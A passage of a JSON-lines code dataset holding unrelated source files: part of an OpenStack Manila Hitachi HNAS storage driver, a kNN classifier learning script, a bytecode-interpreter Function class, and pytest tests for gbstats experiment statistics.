fs_list[i].state == 'Mount':\n                return True\n        return False\n\n    def _get_filesystem_list(self):\n        command = ['filesystem-list']\n        output, err = self._execute(command)\n        items = output.split('\\n')\n        filesystem_list = []\n        fs_name = None\n        if len(items) > 2:\n            j = 0\n            for i in range(2, len(items) - 1):\n                if \"Filesystem \" in items[i] and len(items[i].split()) == 2:\n                    description, fs_name = items[i].split()\n                    fs_name = fs_name[:len(fs_name) - 1]\n                elif \"NoEVS\" not in items[i]:\n                    # Not considering FS without EVS\n                    filesystem_list.append(FileSystem(items[i]))\n                    if fs_name is not None:\n                        filesystem_list[j].name = fs_name\n                        fs_name = None\n                    j += 1\n                else:\n                    LOG.debug(\"Ignoring filesystems without EVS.\")\n\n        return filesystem_list\n\n    def _nfs_export_add(self, share_id):\n        path = '/shares/' + share_id\n        # nfs-export add -S disable -c <client> <export-name> <file-system> <path>\n        command = ['nfs-export', 'add', '-S', 'disable', '-c', '127.0.0.1',\n                   path, self.fs_name, path]\n        output, err = self._execute(command)\n        return True\n\n    def _nfs_export_del(self, share_id):\n        path = '/shares/' + share_id\n        command = ['nfs-export', 'del', path]\n\n        try:\n            output, err = self._execute(command)\n        except exception.HNASBackendException as e:\n            LOG.warning(_LW(\"Export %s does not exist on backend anymore.\"),\n                        path)\n            LOG.exception(six.text_type(e))\n\n    def _update_access_rule(self, share_id, host_list):\n        # build the command line\n        command = ['nfs-export', 'mod', '-c']\n\n        if len(host_list) == 0:\n            command.append('127.0.0.1')\n        else:\n            string_command = '\"' + six.text_type(host_list[0])\n\n            for i in range(1, len(host_list)):\n                string_command += ',' + (six.text_type(host_list[i]))\n            string_command += '\"'\n            command.append(string_command)\n\n        path = '/shares/' + share_id\n        command.append(path)\n        output, err = self._execute(command)\n\n        if (\"Export modified successfully\" in output or\n                \"Export modified successfully\" in err):\n            return True\n        else:\n            return False\n\n    def _nfs_export_list(self, share_id=''):\n        if share_id != '':\n            share_id = '/shares/' + share_id\n        command = ['nfs-export', 'list ', six.text_type(share_id)]\n        output, err = self._execute(command)\n        nfs_export_list = []\n\n        if 'No exports are currently configured' not in output:\n            items = output.split('Export name')\n\n            if items[0][0] == '\\n':\n                items.pop(0)\n\n            for i in range(0, len(items)):\n                nfs_export_list.append(Export(items[i]))\n\n        return nfs_export_list\n\n    def _mount(self, fs):\n        command = ['mount', fs]\n        try:\n            output, err = self._execute(command)\n            if 'successfully mounted' in output:\n                return True\n        except processutils.ProcessExecutionError as e:\n            if 'file system is already mounted' in e.stderr:\n                return True\n            else:\n                msg = six.text_type(e)\n                LOG.exception(msg)\n                raise e\n\n    def _vvol_create(self, vvol_name, vvol_quota):\n        # create a virtual-volume inside directory\n        if self._check_fs():\n            path = '/shares/' + vvol_name\n            command = ['virtual-volume', 'add', '--ensure', self.fs_name,\n                       vvol_name, path]\n            output, err = self._execute(command)\n\n            # put a quota limit in virtual-volume to deny expand abuses\n            self._quota_add(vvol_name, vvol_quota)\n            return True\n        else:\n            msg = (_(\"Filesystem %s does not exist or it is not available \"\n                     \"in the current EVS context.\") % self.fs_name)\n            raise exception.HNASBackendException(msg=msg)\n\n    def _quota_add(self, vvol_name, vvol_quota):\n        if vvol_quota > 0:\n            str_quota = six.text_type(vvol_quota) + 'G'\n            command = ['quota', 'add', '--usage-limit',\n                       str_quota, '--usage-hard-limit',\n                       'yes', self.fs_name, vvol_name]\n            output, err 
= self._execute(command)\n return True\n return False\n\n def _vvol_delete(self, vvol_name):\n path = '/shares/' + vvol_name\n # Virtual-volume and quota are deleted together\n command = ['tree-delete-job-submit', '--confirm', '-f',\n self.fs_name, path]\n try:\n output, err = self._execute(command)\n return True\n except processutils.ProcessExecutionError as e:\n if 'Source path: Cannot access' in e.stderr:\n LOG.debug(\"Share %(shr)s does not exist.\",\n {'shr': six.text_type(vvol_name)})\n else:\n msg = six.text_type(e)\n LOG.exception(msg)\n raise e\n\n def _extend_quota(self, vvol_name, new_size):\n str_quota = six.text_type(new_size) + 'G'\n command = ['quota', 'mod', '--usage-limit', str_quota,\n self.fs_name, vvol_name]\n output, err = self._execute(command)\n return True\n\n def _check_fs(self):\n fs_list = self._get_filesystem_list()\n fs_name_list = []\n for i in range(0, len(fs_list)):\n fs_name_list.append(fs_list[i].name)\n if fs_list[i].name == self.fs_name:\n return True\n return False\n\n def _check_vvol(self, vvol_name):\n command = ['virtual-volume', 'list', '--verbose', self.fs_name,\n vvol_name]\n try:\n output, err = self._execute(command)\n return True\n except processutils.ProcessExecutionError as e:\n msg = six.text_type(e)\n LOG.exception(msg)\n msg = (_(\"Virtual volume %s does not exist.\") % vvol_name)\n raise exception.HNASBackendException(msg=msg)\n\n def _check_quota(self, vvol_name):\n command = ['quota', 'list', '--verbose', self.fs_name, vvol_name]\n output, err = self._execute(command)\n\n if 'No quotas matching specified filter criteria' not in output:\n return True\n else:\n msg = (_(\"Virtual volume %s does not have any quota.\") % vvol_name)\n raise exception.HNASBackendException(msg=msg)\n\n def _check_export(self, vvol_name):\n export = self._nfs_export_list(vvol_name)\n if (vvol_name in export[0].export_name and\n self.fs_name in export[0].file_system_label):\n return True\n else:\n msg = (_(\"Export %s does not exist.\") % export[0].export_name)\n raise exception.HNASBackendException(msg=msg)\n\n def _get_share_quota(self, share_id):\n command = ['quota', 'list', self.fs_name, six.text_type(share_id)]\n output, err = self._execute(command)\n items = output.split('\\n')\n\n for i in range(0, len(items) - 1):\n if ('Unset' not in items[i] and\n 'No quotas matching' not in items[i]):\n if 'Limit' in items[i] and 'Hard' in items[i]:\n quota = float(items[i].split(' ')[12])\n size_unit = items[i].split(' ')[13]\n if size_unit in ('TB', 'GB'):\n # If the quota is 1 or more TB, converts to GB\n if size_unit == 'TB':\n return quota * units.Ki\n return quota\n else:\n msg = (_(\"Share %s does not support quota values \"\n \"below 1GB.\") % share_id)\n raise exception.HNASBackendException(msg=msg)\n else:\n # Returns None if the quota is unset\n return None\n\n @mutils.synchronized(\"hds_hnas_select_fs\", external=True)\n def _locked_selectfs(self, op, path):\n if op == 'create':\n command = ['selectfs', self.fs_name, '\\n',\n 'ssc', '127.0.0.1', 'console-context', '--evs',\n self.evs_id, 'mkdir', '-p', path]\n output, err = self._execute(command)\n\n if op == 'delete':\n command = ['selectfs', self.fs_name, '\\n',\n 'ssc', '127.0.0.1', 'console-context', '--evs',\n self.evs_id, 'rmdir', path]\n try:\n output, err = self._execute(command)\n except processutils.ProcessExecutionError:\n LOG.debug(\"Share %(path)s has more snapshots.\", {'path': path})\n\n\nclass FileSystem(object):\n def __init__(self, data):\n if data:\n items = data.split()\n if len(items) 
>= 7:\n self.name = items[0]\n self.dev = items[1]\n self.on_span = items[2]\n self.state = items[3]\n self.evs = int(items[4])\n self.capacity = int(items[5])\n self.confined = int(items[6])\n if len(items) == 8:\n self.flag = items[7]\n else:\n self.flag = ''\n\n\nclass Export(object):\n def __init__(self, data):\n if data:\n split_data = data.split('Export configuration:\\n')\n items = split_data[0].split('\\n')\n\n self.export_name = items[0].split(':')[1].strip()\n self.export_path = items[1].split(':')[1].strip()\n\n if '*** not available ***' in items[2]:\n self.file_system_info = items[2].split(':')[1].strip()\n index = 0\n\n else:\n self.file_system_label = items[2].split(':')[1].strip()\n self.file_system_size = items[3].split(':')[1].strip()\n self.file_system_free_space = items[4].split(':')[1].strip()\n self.file_system_state = items[5].split(':')[1]\n self.formatted = items[6].split('=')[1].strip()\n self.mounted = items[7].split('=')[1].strip()\n self.failed = items[8].split('=')[1].strip()\n self.thin_provisioned = items[9].split('=')[1].strip()\n index = 7\n\n self.access_snapshots = items[3 + index].split(':')[1].strip()\n self.display_snapshots = items[4 + index].split(':')[1].strip()\n self.read_caching = items[5 + index].split(':')[1].strip()\n self.disaster_recovery_setting = items[6 + index].split(':')[1]\n self.recovered = items[7 + index].split('=')[1].strip()\n self.transfer_setting = items[8 + index].split('=')[1].strip()\n\n self.export_configuration = []\n export_config = split_data[1].split('\\n')\n for i in range(0, len(export_config)):\n if any(j.isdigit() or j.isalpha() for j in export_config[i]):\n self.export_configuration.append(export_config[i])\n\n\nclass JobStatus(object):\n def __init__(self, data):\n if data:\n lines = data.split(\"\\n\")\n\n self.job_id = lines[0].split()[3]\n self.physical_node = lines[2].split()[3]\n self.evs = lines[3].split()[2]\n self.volume_number = lines[4].split()[3]\n self.fs_id = lines[5].split()[4]\n self.fs_name = lines[6].split()[4]\n self.source_path = lines[7].split()[3]\n self.creation_time = \" \".join(lines[8].split()[3:5])\n self.destination_path = lines[9].split()[3]\n self.ensure_path_exists = lines[10].split()[5]\n self.job_state = \" \".join(lines[12].split()[3:])\n self.job_started = \" \".join(lines[14].split()[2:4])\n self.job_ended = \" \".join(lines[15].split()[2:4])\n self.job_status = lines[16].split()[2]\n\n error_details_line = lines[17].split()\n if len(error_details_line) > 3:\n self.error_details = \" \".join(error_details_line[3:])\n else:\n self.error_details = None\n\n self.directories_processed = lines[18].split()[3]\n self.files_processed = lines[19].split()[3]\n self.data_bytes_processed = lines[20].split()[4]\n self.directories_missing = lines[21].split()[4]\n self.files_missing = lines[22].split()[4]\n self.files_skipped = lines[23].split()[4]\n\n skipping_details_line = lines[24].split()\n if len(skipping_details_line) > 3:\n self.skipping_details = \" \".join(skipping_details_line[3:])\n else:\n self.skipping_details = None\n\n\nclass JobSubmit(object):\n def __init__(self, data):\n if data:\n split_data = data.replace(\".\", \"\").split()\n\n self.request_status = \" \".join(split_data[1:4])\n self.job_id = split_data[8]\n\n\nclass Capacity(object):\n def __init__(self, data):\n if data:\n items = data.split()\n self.id = items[0]\n self.label = items[1]\n self.evs = items[2]\n self.size = float(items[3])\n self.size_measure = items[4]\n if self.size_measure == 'TB':\n self.size = 
self.size * units.Ki\n            self.used = float(items[5])\n            self.used_measure = items[6]\n            if self.used_measure == 'TB':\n                self.used = self.used * units.Ki\n","repo_name":"suhaibchishti/sample_scripts","sub_path":"manila/share/drivers/hitachi/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":31966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"25919575975","text":"from numpy import *\r\nimport operator\r\nfrom os import listdir\r\n\r\ndef createDataSet():\r\n    group = array([[1.0,1.1],[1.0,1.0],[0,0],[0,0.1]])\r\n    labels = ['A','A','B','B']\r\n    return group, labels\r\n\r\ndef classify0(inX, dataSet, labels, k):\r\n# When calling this from another file, if the data and the class labels live in the same file, split them into two parts and assign them to dataSet and labels separately\r\n    dataSetSize = dataSet.shape[0]\r\n    #print(dataSetSize)#4\r\n    #print(tile(inX,(dataSetSize,1)))##[[0,0],[0,0],[0,0],[0,0]]\r\n    diffMat = tile(inX, (dataSetSize,1)) - dataSet\r\n    #print(diffMat)\r\n    sqDiffMat = diffMat**2\r\n    #print(sqDiffMat)\r\n    sqDistances = sqDiffMat.sum(axis=1)\r\n    #print(sqDistances)\r\n    distances = sqDistances**0.5\r\n    #print(distances)#[1.48,1.41,0,0.1]\r\n    sortedDistIndicies = distances.argsort() \r\n    #print(sortedDistIndicies)#[2,3,1,0]\r\n    classCount={} \r\n    for i in range(k):\r\n        voteIlabel = labels[sortedDistIndicies[i]]\r\n        #print(voteIlabel)\r\n        classCount[voteIlabel] = classCount.get(voteIlabel,0) + 1\r\n        #print(classCount)# this does not keep only the single nearest neighbor; it takes the k nearest ones and tallies how often each label appears\r\n    sortedClassCount = sorted(classCount.items(), key=operator.itemgetter(1), reverse=True)\r\n    # sort the k nearest neighbors by how many votes each label got, so the most frequent label comes first\r\n    #print(sortedClassCount[0])\r\n    return sortedClassCount[0][0]\r\n\r\ndef file2matrix(filename):\r\n    fr = open(filename)\r\n    www=fr.readlines()\r\n    numberOfLines = len(www)         #get the number of lines in the file\r\n    returnMat = zeros((numberOfLines,3))        #prepare matrix to return\r\n    classLabelVector = []                       #prepare labels return \r\n    #fr = open(filename)### if the www line above is omitted, this line has to be added back (see the original source). but why?\r\n    index = 0\r\n    for line in www:\r\n        line = line.strip()\r\n        listFromLine = line.split('\\t')\r\n        #print(listFromLine)\r\n        returnMat[index,:] = listFromLine[0:3]\r\n        '''\r\n        if listFromLine[-1]=='largeDoses':classLabelVector.append(3)\r\n        else:\r\n            if listFromLine[-1]=='smallDoses':classLabelVector.append(2)\r\n            else:classLabelVector.append(1)'''\r\n        classLabelVector.append(listFromLine[-1])# for the datingTestSet file this line does not work, use the three commented lines above; for datingTestSet2 use this line\r\n        index += 1\r\n    return returnMat,classLabelVector\r\n\r\ndef autoNorm(dataSet):\r\n    minVals = dataSet.min(0)\r\n    #print(minVals)\r\n    maxVals = dataSet.max(0)\r\n    #print(maxVals)\r\n    ranges = maxVals - minVals\r\n    normDataSet = zeros(shape(dataSet))\r\n    m = dataSet.shape[0]# number of rows\r\n    #print(m)#1000\r\n    #print(len(dataSet))#1000\r\n    #print(dataSet[1])\r\n    normDataSet = dataSet - tile(minVals, (m,1))\r\n    normDataSet = normDataSet/tile(ranges, (m,1))   #element wise divide\r\n    return normDataSet, ranges, minVals\r\n    \r\ndef datingClassTest():\r\n    hoRatio = 0.013      #hold-out ratio\r\n    datingDataMat,datingLabels = file2matrix('datingTestSet2.txt')       #load data set from file\r\n    print(datingLabels[:20])\r\n    normMat, ranges, minVals = autoNorm(datingDataMat)\r\n    m = normMat.shape[0]\r\n    numTestVecs = int(m*hoRatio)## number of test vectors\r\n    errorCount = 0.0\r\n    for i in range(numTestVecs):# in effect this splits the data into two parts, one for testing and one for training\r\n        classifierResult = classify0(normMat[i,:],normMat[numTestVecs:m,:],datingLabels[numTestVecs:m],8)\r\n        print (\"the classifier came back with: %s, the real answer is: %s\" % (classifierResult, datingLabels[i]))\r\n        ## int() would be needed here if the labels were stored as numbers\r\n        
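# Tally an error whenever the prediction disagrees with the true label.\r\n        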
if (classifierResult != datingLabels[i]): errorCount += 1.0\r\n    print (\"the total error rate is: %f\" % (errorCount/float(numTestVecs)))\r\n    print (errorCount)\r\n\r\ndef classifyPerson():\r\n    resultList=['not','small','large']\r\n    percentTats=float(input('percentage of time spent playing video games?'))\r\n    ffmilise=float(input('miles per year?'))\r\n    icecream=float(input('liters of ice cream per year?'))\r\n    datingDataMat,datingLabels=file2matrix('datingTestSet2.txt')\r\n    normMat, ranges, minVals=autoNorm(datingDataMat)\r\n    inArr=array([ffmilise,percentTats,icecream])\r\n    classifierResult=classify0((inArr-minVals)/ranges,normMat,datingLabels,3)\r\n    print('you will like the one:', resultList[int(classifierResult)-1])\r\n\r\ndef img2vector(filename):# flatten a 32x32 digit image into a single row vector\r\n    returnVect = zeros((1,1024))\r\n    fr = open(filename)\r\n    for i in range(32):# 32 rows\r\n        lineStr = fr.readline()\r\n        for j in range(32):\r\n            returnVect[0,32*i+j] = int(lineStr[j])\r\n    return returnVect\r\n    \r\ndef handwritingClassTest():\r\n    hwLabels = []\r\n    trainingFileList = listdir('trainingDigits')           #load the training set\r\n    m = len(trainingFileList)\r\n    #print(m)#1934\r\n    trainingMat = zeros((m,1024))\r\n    for i in range(m):\r\n        \r\n        fileNameStr = trainingFileList[i]\r\n        #print(fileNameStr)\r\n        fileStr = fileNameStr.split('.')[0]     #take off .txt\r\n        classNumStr = int(fileStr.split('_')[0])## the digit label at the front of the file name\r\n        #print(classNumStr)\r\n        hwLabels.append(classNumStr)\r\n        #print(hwLabels)# all digit labels, in file order\r\n        trainingMat[i,:] = img2vector('trainingDigits/%s' % fileNameStr)# each file becomes one flattened row of the training matrix\r\n        #print(trainingMat)\r\n    testFileList = listdir('testDigits')        #iterate through the test set\r\n    errorCount = 0.0\r\n    mTest = len(testFileList)\r\n    \r\n    for i in range(mTest):\r\n        fileNameStr = testFileList[i]\r\n        fileStr = fileNameStr.split('.')[0]     #take off .txt\r\n        classNumStr = int(fileStr.split('_')[0])\r\n        vectorUnderTest = img2vector('testDigits/%s' % fileNameStr)# the flattened vector of each test file\r\n        classifierResult = classify0(vectorUnderTest, trainingMat, hwLabels, 5)\r\n        # the flattened vectors were never explicitly linked to their digit labels, but both were stored in the same order, so the prediction can still be checked against the label\r\n        #print (\"the classifier came back with: %d, the real answer is: %d\" % (classifierResult, classNumStr))\r\n        if (classifierResult != classNumStr): errorCount += 1.0\r\n    print (\"\\nthe total number of errors is: %d\" % errorCount)\r\n    print (\"\\nthe total error rate is: %f\" % (errorCount/float(mTest)))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"sevenry/python_learning_note","sub_path":"machine_learning/ss2/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"20851874286","text":"class Function(object):\n    \"\"\"\n    Create a realistic function object, defining the things the interpreter expects.\n    \"\"\"\n    __slots__ = [\n        'func_code', 'func_name', 'func_defaults', 'func_globals',\n        'func_locals', 'func_dict', 'func_closure',\n        '__name__', '__dict__', '__doc__',\n        '_vm', '_func',\n    ]\n\n    def __init__(self, name, code, globs, defaults, closure, vm):\n        \"\"\"You don't need to follow this closely to understand the interpreter.\"\"\"\n        self._vm = vm\n        self.func_code = code\n        self.func_name = self.__name__ = name or code.co_name\n        self.func_defaults = tuple(defaults)\n        self.func_globals = globs\n        self.func_locals = self._vm.frame.f_locals\n        self.__dict__ = {}\n        self.func_closure = closure\n        self.__doc__ = code.co_consts[0] if code.co_consts else None\n\n        # Sometimes, we need a real Python function. 
This is for that.\n kw = {\n 'argdefs': self.func_defaults,\n }\n if closure:\n kw['closure'] = tuple(make_cell(0) for _ in closure)\n self._func = types.FunctionType(code, globs, **kw)\n\n def __call__(self, *args, **kwargs):\n \"\"\"When calling a Function, make a new frame and run it.\"\"\"\n callargs = inspect.getcallargs(self._func, *args, **kwargs)\n # Use callargs to provide a mapping of arguments: values to pass into the new\n # frame.\n frame = self._vm.make_frame(\n self.func_code, callargs, self.func_globals, {}\n )\n return self._vm.run_frame(frame)\n\ndef make_cell(value):\n \"\"\"Create a real Python closure and grab a cell.\"\"\"\n # Thanks to Alex Gaynor for help with this bit of twistiness.\n fn = (lambda x: lambda: x)(value)\n return fn.__closure__[0]\n","repo_name":"doubledherin/my_compiler","sub_path":"function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"42759998249","text":"import pytest\nimport numpy as np\nimport pandas as pd\nfrom gbstats.gbstats import (\n check_srm,\n get_adjusted_stats,\n process_user_rows,\n process_metric_rows,\n run_analysis,\n correctMean,\n correctStddev,\n detect_unknown_variations,\n reduce_dimensionality,\n analyze_metric_df,\n get_metric_df,\n)\nfrom functools import partial\n\nDECIMALS = 9\nround_ = partial(np.round, decimals=DECIMALS)\n\n\ndef test_srm():\n p = check_srm([1000, 1200], [0.5, 0.5])\n assert round_(p) == 0.000020079\n\n\ndef test_correct_stddev():\n s = correctStddev(100, 10, 5, 150, 15, 3)\n assert round_(s) == 4.620540833\n s = correctStddev(0, 0, 0, 1, 15, 0)\n assert s == 0\n\n\ndef test_correct_mean():\n m = correctMean(100, 10, 150, 15)\n assert m == 13\n m = correctMean(0, 0, 1, 15)\n assert m == 15\n\n\ndef test_unknown_variations():\n rows = pd.DataFrame(\n [\n {\n \"dimension\": \"All\",\n \"variation\": \"one\",\n \"count\": 120,\n \"mean\": 2.5,\n \"stddev\": 1,\n \"users\": 1000,\n },\n {\n \"dimension\": \"All\",\n \"variation\": \"zero\",\n \"count\": 100,\n \"mean\": 2.7,\n \"stddev\": 1.1,\n \"users\": 1100,\n },\n ]\n )\n assert detect_unknown_variations(rows, {\"zero\": 0, \"one\": 1}) == set()\n assert detect_unknown_variations(rows, {\"zero\": 0, \"hello\": 1}) == {\"one\"}\n assert detect_unknown_variations(rows, {\"hello\": 0, \"world\": 1}) == {\"one\", \"zero\"}\n\n\ndef test_multiple_exposures():\n rows = pd.DataFrame(\n [\n {\n \"dimension\": \"All\",\n \"variation\": \"one\",\n \"count\": 120,\n \"mean\": 2.5,\n \"stddev\": 1,\n \"users\": 1000,\n },\n {\n \"dimension\": \"All\",\n \"variation\": \"two\",\n \"count\": 100,\n \"mean\": 2.7,\n \"stddev\": 1.1,\n \"users\": 1100,\n },\n {\n \"dimension\": \"All\",\n \"variation\": \"__multiple__\",\n \"count\": 50,\n \"mean\": 2.7,\n \"stddev\": 1.1,\n \"users\": 500,\n },\n ]\n )\n assert detect_unknown_variations(rows, {\"one\": 0, \"two\": 1}) == set()\n assert detect_unknown_variations(rows, {\"one\": 0, \"two\": 1}, {\"some_other\"}) == {\n \"__multiple__\"\n }\n\n\ndef test_reduce_dimensionality():\n rows = pd.DataFrame(\n [\n {\n \"dimension\": \"one\",\n \"variation\": \"one\",\n \"count\": 120,\n \"mean\": 2.5,\n \"stddev\": 1,\n \"users\": 1000,\n },\n {\n \"dimension\": \"one\",\n \"variation\": \"zero\",\n \"count\": 100,\n \"mean\": 2.7,\n \"stddev\": 1.1,\n \"users\": 1100,\n },\n {\n \"dimension\": \"two\",\n \"variation\": \"one\",\n \"count\": 220,\n \"mean\": 3.5,\n \"stddev\": 2,\n \"users\": 
2000,\n },\n {\n \"dimension\": \"two\",\n \"variation\": \"zero\",\n \"count\": 200,\n \"mean\": 3.7,\n \"stddev\": 2.1,\n \"users\": 2100,\n },\n {\n \"dimension\": \"three\",\n \"variation\": \"one\",\n \"count\": 320,\n \"mean\": 4.5,\n \"stddev\": 3,\n \"users\": 3000,\n },\n {\n \"dimension\": \"three\",\n \"variation\": \"zero\",\n \"count\": 300,\n \"mean\": 4.7,\n \"stddev\": 3.1,\n \"users\": 3100,\n },\n ]\n )\n df = get_metric_df(rows, {\"zero\": 0, \"one\": 1}, [\"zero\", \"one\"], True, \"revenue\")\n reduced = reduce_dimensionality(df, 3)\n print(reduced)\n assert len(reduced.index) == 3\n assert reduced.at[0, \"dimension\"] == \"three\"\n assert reduced.at[0, \"v1_mean\"] == 4.5\n assert reduced.at[0, \"v1_stddev\"] == 3.0\n assert reduced.at[0, \"v1_total\"] == 1440.0\n\n reduced = reduce_dimensionality(df, 2)\n print(reduced)\n assert len(reduced.index) == 2\n assert reduced.at[1, \"dimension\"] == \"(other)\"\n assert round_(reduced.at[1, \"v1_mean\"]) == 3.147058824\n assert round_(reduced.at[1, \"v1_stddev\"]) == 1.778805952\n assert reduced.at[1, \"total_users\"] == 640\n assert reduced.at[1, \"v1_users\"] == 340\n assert reduced.at[1, \"v1_total\"] == 1070\n assert reduced.at[1, \"baseline_users\"] == 300\n assert reduced.at[1, \"baseline_total\"] == 1010\n\n\ndef test_analyze_metric_df():\n rows = pd.DataFrame(\n [\n {\n \"dimension\": \"one\",\n \"variation\": \"one\",\n \"count\": 120,\n \"mean\": 2.5,\n \"stddev\": 1,\n \"users\": 1000,\n },\n {\n \"dimension\": \"one\",\n \"variation\": \"zero\",\n \"count\": 100,\n \"mean\": 2.7,\n \"stddev\": 1.1,\n \"users\": 1100,\n },\n {\n \"dimension\": \"two\",\n \"variation\": \"one\",\n \"count\": 220,\n \"mean\": 3.5,\n \"stddev\": 2,\n \"users\": 2000,\n },\n {\n \"dimension\": \"two\",\n \"variation\": \"zero\",\n \"count\": 200,\n \"mean\": 3.7,\n \"stddev\": 2.1,\n \"users\": 2100,\n },\n ]\n )\n df = get_metric_df(rows, {\"zero\": 0, \"one\": 1}, [\"zero\", \"one\"], False, \"revenue\")\n result = analyze_metric_df(df, [0.5, 0.5], \"revenue\", False)\n\n assert len(result.index) == 2\n assert result.at[0, \"dimension\"] == \"one\"\n assert round_(result.at[0, \"baseline_cr\"]) == 0.245454545\n assert round_(result.at[0, \"baseline_risk\"]) == 0.186006962\n assert round_(result.at[0, \"v1_cr\"]) == 0.3\n assert round_(result.at[0, \"v1_risk\"]) == 0.00418878\n assert round_(result.at[0, \"v1_expected\"]) == 0.222222222\n assert round_(result.at[0, \"v1_prob_beat_baseline\"]) == 0.925127213\n\n\ndef test_adjusted_stats():\n adjusted = get_adjusted_stats(5, 3, 1000, 2000, False, \"revenue\")\n print(adjusted)\n assert adjusted[\"users\"] == 2000\n assert adjusted[\"mean\"] == 2.5\n assert round_(adjusted[\"stddev\"]) == 3.278852762\n assert adjusted[\"total\"] == 5000\n\n\ndef test_adjusted_stats_binomial():\n adjusted = get_adjusted_stats(1, 0, 1000, 2000, False, \"binomial\")\n print(adjusted)\n assert adjusted[\"users\"] == 2000\n assert adjusted[\"mean\"] == 1\n assert round_(adjusted[\"stddev\"]) == 0\n assert adjusted[\"total\"] == 1000\n\n\ndef test_adjusted_stats_ignore_nulls():\n adjusted = get_adjusted_stats(5, 3, 1000, 2000, True, \"revenue\")\n assert adjusted[\"users\"] == 1000\n assert adjusted[\"mean\"] == 5\n assert adjusted[\"stddev\"] == 3\n assert adjusted[\"total\"] == 5000\n\n\ndef test_process_users():\n vars = {\"zero\": 0, \"one\": 1}\n rows = pd.DataFrame(\n [{\"variation\": \"one\", \"users\": 120}, {\"variation\": \"zero\", \"users\": 100}]\n )\n users, unknown_variations = 
process_user_rows(rows, vars)\n\n assert users == [100, 120]\n assert unknown_variations == []\n\n\ndef test_process_users_unknown_vars():\n var_id_map = {\"zero\": 0, \"one\": 1}\n rows = pd.DataFrame(\n [{\"variation\": \"one\", \"users\": 120}, {\"variation\": \"zeros\", \"users\": 100}]\n )\n users, unknown_variations = process_user_rows(rows, var_id_map)\n\n assert users == [0, 120]\n assert unknown_variations == [\"zeros\"]\n\n\ndef test_process_metrics():\n rows = pd.DataFrame(\n [\n {\"variation\": \"one\", \"count\": 120, \"mean\": 2.5, \"stddev\": 1},\n {\"variation\": \"zero\", \"count\": 100, \"mean\": 2.7, \"stddev\": 1.1},\n ]\n )\n var_id_map = {\"zero\": 0, \"one\": 1}\n users = [1000, 1010]\n\n res = process_metric_rows(rows, var_id_map, users, False, \"revenue\")\n assert res.loc[0].at[\"users\"] == 1000\n assert res.loc[0].at[\"count\"] == 100\n assert res.loc[0].at[\"mean\"] == 0.27\n assert round_(res.loc[0].at[\"stddev\"]) == 0.881286938\n\n\ndef test_process_metrics_ignore_nulls():\n rows = pd.DataFrame(\n [\n {\"variation\": \"one\", \"count\": 120, \"mean\": 2.5, \"stddev\": 1},\n {\"variation\": \"zero\", \"count\": 100, \"mean\": 2.7, \"stddev\": 1.1},\n ]\n )\n var_id_map = {\"zero\": 0, \"one\": 1}\n users = [1000, 1010]\n\n res = process_metric_rows(rows, var_id_map, users, True, \"revenue\")\n assert res.loc[0].at[\"users\"] == 100\n assert res.loc[0].at[\"count\"] == 100\n assert res.loc[0].at[\"mean\"] == 2.7\n assert round_(res.loc[0].at[\"stddev\"]) == 1.1\n\n\ndef test_binomial_analysis():\n metric = pd.DataFrame(\n [\n {\"users\": 1000, \"count\": 120, \"mean\": 1, \"stddev\": 0, \"total\": 120},\n {\"users\": 1024, \"count\": 128, \"mean\": 1, \"stddev\": 0, \"total\": 128},\n {\"users\": 1000, \"count\": 102, \"mean\": 1, \"stddev\": 0, \"total\": 102},\n ]\n )\n var_names = [\"Control\", \"Variation 1\", \"Variation 2\"]\n res = run_analysis(metric, var_names, \"binomial\", False)\n\n baseline = res.loc[0]\n var1 = res.loc[1]\n var2 = res.loc[2]\n\n assert baseline.at[\"variation\"] == \"Control\"\n assert baseline.at[\"conversion_rate\"] == 0.12\n assert baseline.at[\"chance_to_beat_control\"] == None\n assert round_(baseline.at[\"risk_of_choosing\"]) == 0.069118343\n assert baseline.at[\"percent_change\"] == None\n\n assert var1.at[\"variation\"] == \"Variation 1\"\n assert var1.at[\"conversion_rate\"] == 0.125\n assert round_(var1.at[\"chance_to_beat_control\"]) == 0.633751254\n assert round_(var1.at[\"risk_of_choosing\"]) == 0.029338254\n assert round_(var1.at[\"percent_change\"]) == 0.041432724\n\n assert var2.at[\"variation\"] == \"Variation 2\"\n assert var2.at[\"conversion_rate\"] == 0.102\n assert round_(var2.at[\"chance_to_beat_control\"]) == 0.100849049\n assert round_(var2.at[\"risk_of_choosing\"]) == 0.182688464\n assert round_(var2.at[\"percent_change\"]) == -0.149376661\n\n\ndef test_gaussian_analysis():\n metric = pd.DataFrame(\n [\n {\"users\": 1000, \"count\": 120, \"mean\": 1.3, \"stddev\": 1, \"total\": 156},\n {\"users\": 1024, \"count\": 128, \"mean\": 1.29, \"stddev\": 0.9, \"total\": 165.12},\n {\"users\": 1000, \"count\": 102, \"mean\": 1.4, \"stddev\": 1.1, \"total\": 142.8},\n ]\n )\n var_names = [\"Control\", \"Variation 1\", \"Variation 2\"]\n res = run_analysis(metric, var_names, \"duration\", True)\n\n baseline = res.loc[0]\n var1 = res.loc[1]\n var2 = res.loc[2]\n\n assert baseline.at[\"variation\"] == \"Control\"\n assert baseline.at[\"per_user\"] == 0.156\n assert baseline.at[\"chance_to_beat_control\"] == None\n 
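# the control row has no chance-to-beat or lift computed against itself\n    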
